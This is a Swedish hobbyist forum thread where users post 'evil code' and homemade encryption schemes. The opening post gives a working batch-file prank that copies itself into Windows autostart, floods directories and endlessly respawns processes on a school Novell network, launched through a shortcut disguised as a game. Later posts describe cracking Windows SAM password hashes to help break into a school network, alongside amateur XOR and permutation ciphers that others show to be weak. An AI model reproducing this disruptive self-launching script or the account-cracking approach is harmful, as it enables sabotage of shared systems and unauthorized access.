Posta era ondske koder och kryptos här!

Permalänk

Posta era ondske koder och kryptos här!

TÄnkte vi kunde dela lite koder med varandra,,,,,,

skriv ett snyggt krypteringsprogram lr någon skitstörande kod för windows lr *nix.

mitt bidrag till krypteringsprogram (välidgt enkelt men kraftfullt)

INPUT; encrypt$
PRINT ASC((MID$(ord$,y))) * 2 * 23.6 * LEN(encrypt$) * 2.000001 * 30 *1993;
end

'skitenkel kod som är kraftfull om man bara får det krypterade. men roligt

mitt bidrag till störande kod är en som baseras på skolans novell system:

BATCH fil 1 (batchfile1.bat)
CLS
echo off
copy batchfile2.bat C:/program/autostart lr var autostart nu ligger
copy DATA.txt -//-
copy System.bat -//-
copy System32.bat -//-
exit

BATCH fil 2 (batchfile2.bat)
for /f "tokens=1*" %i in (DATA.txt) DO mkdir C:/windows/%i
for /f "tokens=1*" %i in (DATA.txt) DO mkdir H:/%i
for /f "tokens=1*" %i in (DATA.txt) DO copy System.bat H:/%i/System.bat
for /f "tokens=1*" %i in (DATA.txt) DO copy System.bat C:/windows/%i/System.bat
for /f "tokens=1*" %i in (DATA.txt) DO copy System.bat H:/%i/System32.bat
for /f "tokens=1*" %i in (DATA.txt) DO copy System.bat C:/windows/%i/System32.bat
exit

DATA.txt:
1
2
3
4
5
osv...

System.bat:
START System32.bat //den här raden förekommer ca 1000000 gånger i System.bat för att jävlas riktigt ordentligt

System32.bat:
dir C:/windows/system32/ //den här raden förekommer åkså ca 1000000 gånger i SYstem32.bat för att vara riktigt störande
START system.bat
end

MUHAHAHAHAHA! rikgigt jävla enkel och barnslig men nog så rolig och ondskefull...

ett litet p.s. är att batchfile1.bat får en genväg som döps till något lockande som Cs eller liero lr liknande

posta era roliga koder!

chown -r us ./base
//Lusius

Visa signatur

Kakor kakor kakor

Permalänk
Medlem

Rolig tråd

ok, ska bidra med en kodsnutt som räknar ut checksumman (den i headern) på en exefil; en rätt rolig kod om jag får säga det själv. Använde den till ett program som spottade ut exe-filer.

edit: algoritmen förutsätter att checksumman är nollad. buf är en buffert med en exe-fil inläst (med 0ad checksum alltså) och len är längden på bufferten (storleken på exen).

ExeCheckSumman PROC C uses esi ,buf:dword,len:dword mov ecx,[len] mov edx,[buf] shr ecx,1 xor eax,eax @@Loopelidoop: adc ax,[edx+(ecx*2)-2] dec ecx jnz @@Loopelidoop adc eax,[len] ret ExeCheckSumman ENDP

edit2: tog bort en onödig instuktion

Visa signatur

www.filipsprogram.tk - lite freeware
"Delight, herregud. Talang är bara förnamnet."

Permalänk

den va skööön och onödig som det skall vara

Visa signatur

Kakor kakor kakor

Permalänk
Hedersmedlem

Citat från http://www.sweclockers.com/forum/showthread.php?s=&postid=653...

Citat:

Ursprungligen inskrivet av Lusius
asså det var bara en liten parantes av hur programmet funkar....ingentligen matar den output i en textfil som sedan krypteras ungefär sådär......skitenkelt...
programmet är altså en .exe kompilerad BASIC kod som jag använder för att kryptera planer så att de blir oläsliga utan en dekrypter
vi kan väl ta det här isåfall i den andra tråden som jag gjorde och återgå till chassit här

//Lusius

Jag trodde du ville ha någon totallösning för kryptering av "alla" filer (exkluderar systemfiler osv).

Sättet du krypterar på borde väl vara sårbart för frekvensanalys i.o.m. att samma matematiska operation sker för varje tecken. Och på så sätt så är det trivialt att reversera det med hjälp av koden som användes (därför du inte vill lägga ut den här antar jag utan kör med enkla exempel).

Om jag bara får säga det rakt ut känns det faktiskt osäkert.

Visa signatur

Forumregler | Feedbackforumet | Något som behöver modereras? Tryck på Anmäl inlägget och ge en anledning, någon moderator kommer granska inlägget och göra (egen) bedömning
"Fate. Protects fools, little children and ships named Enterprise." - Riker - ST:TNG

Permalänk

det är inte fort knox...men den egetliga koden använder många andra funktioner för att göra koden oläslig...och så byts alla siffror ut till skumvalda tal mellan 1000-10000000. det gör det ganska jobbigt att dekryptera om man vill veta min planereeeeeeeeeee

Visa signatur

Kakor kakor kakor

Permalänk
Medlem

Eh, kan du bara kryptera texten, eller kan du få fram orginalet igen med nån annan kod?

Visa signatur

www.filipsprogram.tk - lite freeware
"Delight, herregud. Talang är bara förnamnet."

Permalänk
Medlem

Eh, nej, det där är på precis samma nivå som caesarchiffer. Det håller borta din lillsyrra, men inte någon som är van att göra en kryptoanalys.

Visa signatur

Mina boktips: Clean codeHead First Design PatternsHead First Object-oriented Analysis and Design
Innovation distinguishes between a leader and a follower. — Steve Jobs

Permalänk
Medlem

Ett krypto som är litet i kod och faktiskt användbart (men fortfarande inte lika säker som t ex AES) är TEA.

Permalänk

asså inse...ceasar koden äger nästan den här-.

koden är gjord för att hålla undan skolans snokande data admin

Visa signatur

Kakor kakor kakor

Permalänk
Medlem

Varför inte använda en riktig kryptering istället då?

Visa signatur

Mina boktips: Clean codeHead First Design PatternsHead First Object-oriented Analysis and Design
Innovation distinguishes between a leader and a follower. — Steve Jobs

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av DrRotmos
Varför inte använda en riktig kryptering istället då?

varför måste man vara blodigt seriös? roligare med något eget litet hobbyscript ju

Visa signatur

Logic is the art of going wrong with confidence.

Permalänk
Avstängd

valfrittobjekt.GetHashCode();

jättesäkert att använda för kryptering, eller inte

Visa signatur
Permalänk
Medlem

DrRotmos, kan du ge oss ett exempel på rikigt kryptering.
Och CyberVillain, är inte den stora skillnaden mellan hashar och kryptering att hashar ska det inte gå att återställa och en kryptering bör vara svårt knäckt med gå att återställa med rätt nyckel? Vad är det för spåk? Är det en inbyggd krypterings sak i något språk med roligt namn?

Permalänk
Avstängd

jag barade skojade lite.. nej hasning går inte att återvända (om man inte av en slump får tillbax rätt värde)

förutom vid indexering kan man använda hashning för att tillexempel göra lösenord oläsbara i en databas etc...

Visa signatur
Permalänk
Medlem

"och så byts alla siffror ut till skumvalda tal mellan 1000-10000000"
Det känns inte riktigt som kryptering det där? Snarare bara data-förstörning. Om du ska förstöra data så tycker jag du bara ska skriva över datan med nollor och se till att göra det mer än en gång (typ 5 kanske).

Citat:

Ursprungligen inskrivet av CIC
DrRotmos, kan du ge oss ett exempel på rikigt kryptering.

Blowfish, Twofish, RSA, Triple DES?

Visa signatur

I just love the fact that there is a global integer variable named 'i'. Just think, you will never need to declare your loop variable again!
To avoid collisions where a loop that uses 'i' calls another function that loops with 'i', be sure to stack 'i' and restore it when your function exits.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Myris
Blowfish, Twofish, RSA, Triple DES?

Tvivlar på att rotmos har gjort domdära :), menade någon som han hade gjort själv. Så han kunde se vilken tid det skullle ta att göra dem, men det nu ens skulle gå.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av CyberVillain
jag barade skojade lite.. nej hasning går inte att återvända (om man inte av en slump får tillbax rätt värde)

förutom vid indexering kan man använda hashning för att tillexempel göra lösenord oläsbara i en databas etc...

hmm, jag vet inte om du har försökt hacka windows nån gång (*host* ditt eget då alltså *host* ), då är det så att alla lösenord och användarnamn ligger i en fil vid namn SAM (t ex: "C:\WINDOWS\system32\config\SAM"), där ligger användarnamnen okrypterade, och lösenorden är haschade. Sen googlar man lite alternativt skriver ett eget program, så får man tag på ett script/program som "de-haschar" lösenorden, voila, man (eller låtit nån) har kört en hasch baklänges :D.

mvh Fredrik

Permalänk
Hedersmedlem

Men om man stänger av NTLM hashningen (som är ganska onödigt i dagens läge har jag för mig) så har jag för mig det blev svårare att få fram lösenorden. Rätt?

Visa signatur

Forumregler | Feedbackforumet | Något som behöver modereras? Tryck på Anmäl inlägget och ge en anledning, någon moderator kommer granska inlägget och göra (egen) bedömning
"Fate. Protects fools, little children and ships named Enterprise." - Riker - ST:TNG

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Aqualize
Men om man stänger av NTLM hashningen (som är ganska onödigt i dagens läge har jag för mig) så har jag för mig det blev svårare att få fram lösenorden. Rätt?

Jag vet att det ska gå att ändra det, så att man får en annan kryptering, men jag vet inte så mycket om det. sen om det är onödigt, det skulle jag inte säga, visst, normalt sett är filen läs/kopierings/skriv-skyddad så att man inte ska kunna få tag på något av inehållet, men det finns program som gör att man ändå kan få tag på det, samt att man skulle kunna dual-boota från linux, mounta windows disken och därifrån hämta filen. Finns tusentals sätt att komma över filen, så det gäller att den är krypterad på ett eller annat sätt. Sen et andra sättet (alltså inte haschningen) vet jag inte så mycket om, men här, precis som för mycket annat så: google is your friend, där kan man hitta allt

mvh Fredrik

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av CIC
Tvivlar på att rotmos har gjort domdära :), menade någon som han hade gjort själv. Så han kunde se vilken tid det skullle ta att göra dem, men det nu ens skulle gå.

Självklart har jag inte gjort de där. Jag har förvisso implementerat RSA, men inte skapat dem. Fråga dig själv, hur säker tror du en kryptering som du eller jag skapar är? Inte särskilt säger jag.

Edit: kd35a, anledningen till att man kan göra så är att det är en väldigt svag hashningsalgoritm som används för NTLM. Sedan är det inte säkert att du hittar rätt lösenord, utan du hittar bara en kollision. Den KAN vara lösenordet, men troligare är att det bara är ett annat lösenord som också fungerar.

Visa signatur

Mina boktips: Clean codeHead First Design PatternsHead First Object-oriented Analysis and Design
Innovation distinguishes between a leader and a follower. — Steve Jobs

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av DrRotmos
Självklart har jag inte gjort de där. Jag har förvisso implementerat RSA, men inte skapat dem. Fråga dig själv, hur säker tror du en kryptering som du eller jag skapar är? Inte särskilt säger jag.

Edit: kd35a, anledningen till att man kan göra så är att det är en väldigt svag hashningsalgoritm som används för NTLM. Sedan är det inte säkert att du hittar rätt lösenord, utan du hittar bara en kollision. Den KAN vara lösenordet, men troligare är att det bara är ett annat lösenord som också fungerar.

trådnamn: "Posta era ondskekoder och kryptos här!"
Då tycker iallafall inte jag att det skulle vara så roligt om folk satt o skrev sina RSA-implementationer eller liknande i tråden.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av DrRotmos
Edit: kd35a, anledningen till att man kan göra så är att det är en väldigt svag hashningsalgoritm som används för NTLM. Sedan är det inte säkert att du hittar rätt lösenord, utan du hittar bara en kollision. Den KAN vara lösenordet, men troligare är att det bara är ett annat lösenord som också fungerar.

Jo, det är förvisso rätt, men alla gångerna jag har försökt hacka (min egen dator naturligtvis ) så har det alltit kommit fram rätt lösenord, och schansen att det finns två exakt lika dana hasch-algorithmer (eller vad det heter) är minimal, så det är ganska säkert att du får rätt lösenord, men visst, en viss felmarginal får man räkna med.

mvh Fredrik

Permalänk
Medlem

Grabbs, lägg av o besudla tråden med er scheit. Och kd35a, varje gång jag läser dina l33t-hacker-wannabe-insinuationer går det en kall kår längs ryggraden på mig.

Iaf, här kommer en väldigt användbar kodsnutt. En pascal-implementation av den klassiska XOR-krypteringen. Den har blivit populär för att den är så lätt att implementera och, framförallt, samma funktion används både för att kryptera och dekryptera.

"mitt meddelande" XOR "min nyckel" = "krypterad utdata"
och
"krypterad utdata" XOR "min nyckel" = "mitt meddelande"

Jättesmidigt

function cryptXOR(const text,key:string):string; var i,k:integer; begin k:=1; for i := 1 to length(text) do begin result := result + chr(byte(text[i]) XOR byte(key[k])); k := k mod length(key) + 1 end; end;

Denna kodsnutt kan lätt översättas till andra språk, tex visual basic eller C++, utan att man behöver göra om koden särskillt mycket.

Visa signatur

www.filipsprogram.tk - lite freeware
"Delight, herregud. Talang är bara förnamnet."

Permalänk
Citat:

Ursprungligen inskrivet av DrRotmos
Självklart har jag inte gjort de där. Jag har förvisso implementerat RSA, men inte skapat dem. Fråga dig själv, hur säker tror du en kryptering som du eller jag skapar är? Inte särskilt säger jag.

Inte så svårt att skapa säker krypteing, med one-time-pads så går det busenkelt.

Först genererar man, med tärningar, bollar eller nån bra random-algoritm, en nyckel, man ger en kopia till mottagaren. Sen xorar man sin data med nyckeln.

100% säkert*, kan implementeras av praktiskt taget vem som helst.

*På vilkor att nyckeln inte kommer på villovägar och att man inte använder one-time-paden mer än en gång, då. Slumpdatan måste vara utan detekterbara mönster också.

Visa signatur

Python-IRC på svenska: #python.se

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Sebastianj
Inte så svårt att skapa säker krypteing, med one-time-pads så går det busenkelt.

Först genererar man, med tärningar, bollar eller nån bra random-algoritm, en nyckel, man ger en kopia till mottagaren. Sen xorar man sin data med nyckeln.

100% säkert*, kan implementeras av praktiskt taget vem som helst.

* På vilkor att nyckeln kommer på villovägar och att man inte använder one-time-paden mer än en gång, då. Slumpdatan måste vara utan detekterbara mönster också.

Så gjorde jag till ett program en gång. Om jag inte missuppfattat dig, eller det gjorde jag nog förästen. Jag gjorde iaf nått i stil med:

RandomSeed = $DEADBEEF; //<--min nyckel for i = 1 to length(minText) do minText[i] = minText[i] XOR (Random AND $FF);

Funkade skitbra har jag för mig och den fungerar både som krypterare och avkrypterare

Visa signatur

www.filipsprogram.tk - lite freeware
"Delight, herregud. Talang är bara förnamnet."

Permalänk
Medlem

Blev lite inspirerad och hittade på en egen kryptering som jag skrev i python. Den bygger på att man har 32-bitars data med en 4*32 bitars nyckel där varje 4-bit i den anger vilken bit i datan som ska flyttas dit. T.ex. om de första 4 bitarna i nyckeln är talet 4 så ska den 4e biten i datan hamna på första plats i den krypterade datan. Därefter xor:as denna bit med den första biten i de 4 bitarna i nyckeln. Principen är enkel, hur säkert det blir vet jag dock inte

Iaf blir det 32! = 263130836933693530167218012160000000 olika kombinationer på permutationerna av bitarna att söka igenom om man känner för det, sedan stökar väl xor:en till lite om man vill göra någon sorts dataanalys antar jag, mest därför jag la till den.

Denna kryptering fungerar allstå bra om man har mycket data som består av 32-bitars ord.

from random import choice def generate_key(): key = [] nokey = [i for i in xrange(32)] for i in xrange(32): c = choice(nokey) nokey.remove(c) key.append(c) return key def encrypt(data,key): enc_data = [0 for i in xrange(32)] for i in xrange(32): enc_data[i] = data[key[i]]^(key[i] & 1) return enc_data def decrypt(enc_data,key): data = [0 for i in xrange(32)] for i in xrange(32): data[key[i]] = enc_data[i]^(key[i] & 1) return data

Visa signatur

MacBook Pro: 2.0GHz Intel Core Duo / ATI x1600 256MB / 1x1GB 667 DDR2 / 100GB SATA Drive@5400rpm

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Sebastianj
Inte så svårt att skapa säker krypteing, med one-time-pads så går det busenkelt.

Först genererar man, med tärningar, bollar eller nån bra random-algoritm, en nyckel, man ger en kopia till mottagaren. Sen xorar man sin data med nyckeln.

100% säkert*, kan implementeras av praktiskt taget vem som helst.

*På vilkor att nyckeln inte kommer på villovägar och att man inte använder one-time-paden mer än en gång, då. Slumpdatan måste vara utan detekterbara mönster också.

Du kan knappast påstå att du har uppfunnit one-time-pads

Edit: Ookk: Din algoritm är svag mot known plaintext attacks. Dessutom brukar man vilja använda särskilda slumptalsalgoritmer när man genererar nycklar.

Visa signatur

Mina boktips: Clean codeHead First Design PatternsHead First Object-oriented Analysis and Design
Innovation distinguishes between a leader and a follower. — Steve Jobs

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av DrRotmos
Ookk: Din algoritm är svag mot known plaintext attacks. Dessutom brukar man vilja använda särskilda slumptalsalgoritmer när man genererar nycklar.

Nu vet jag inte så mkt om kryptering, men får man anta att en fientlig person vet om hur krypteringen går till och att han har tillgång till en låda som genererar krypterad data med en viss nyckel? Det enda han inte vet är alltså själva nyckeln?

I sånna fall är min kryptering mycket svag. Räcker med att testa 33st ord för att avslöja nyckeln:

Först stoppar man in ett ord med bara 1or i krypteringslådan och får därmet ut xor-masken. Sedan stoppar man in 32st 32bitars ord med samtliga platser 0 förutom 1 på ett ställe (olika för varje ord). Man tar dessa krypterade ord, applicerar den hittade xor-masken och sedan så vet man precis hur bitarna permuterats. Dvs man har hittat nyckeln.

Har den fientlige personen däremot inte tillgång till någon låda som genererar data med min nyckel så blir det lite svårare.

Visa signatur

MacBook Pro: 2.0GHz Intel Core Duo / ATI x1600 256MB / 1x1GB 667 DDR2 / 100GB SATA Drive@5400rpm

Permalänk
Citat:

Ursprungligen inskrivet av ookk
Har den fientlige personen däremot inte tillgång till någon låda som genererar data med min nyckel så blir det lite svårare.

Algoritm bör man alltid utgå från att han har, annars snackar ci security by obscurity, vilket oftast inte är en bra ide.

Se finns såklart risken att han råkar komma över ett meddelande du skickat i både krypterad och okrypterad form, kanske ditt namn eller nått. Så det finns ju alltid anledning att hålla sånt säkert med.

Sen får jag känslan att den största säkerheten i algoritmen faktiskt är xorningen, nyckeln fungerar då mest som en one-time pad, vilket skulle innebära att en persom med tillgång till flera krypterade bitar skulle kunna ta reda på nyckeln. Men jag är sjuk atm, så jag kan vara ute på hal is här.

Btw:

def generate_key(): return random.shuffle(range(32))

Visa signatur

Python-IRC på svenska: #python.se

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Delight
Grabbs, lägg av o besudla tråden med er scheit. Och kd35a, varje gång jag läser dina l33t-hacker-wannabe-insinuationer går det en kall kår längs ryggraden på mig.

ok, jag vet att det e lite wannabe att haxxa windows, men jag vet inget bättre exempel på när man kör en hasch baklänges, sen är det inte normalt att jag haxxar windows, det var en kompis som hade fått för sig att haxxa skolan (känns lönt btw, e inte så kul om dom skulle komma på en å stänga av en från domänen (hela skolan??)), så jag hjälpte honom lite att leta efter hur man gjorde de. ok, medhjälp till brått, men jag har snackat ifrån honom det nu att han ska göra det, han har gett upp.

förlåt om du inte tycker om de, så detta blir mitt sista inlägg i denna tråd. bra iaf att du sa till.

mvh Fredrik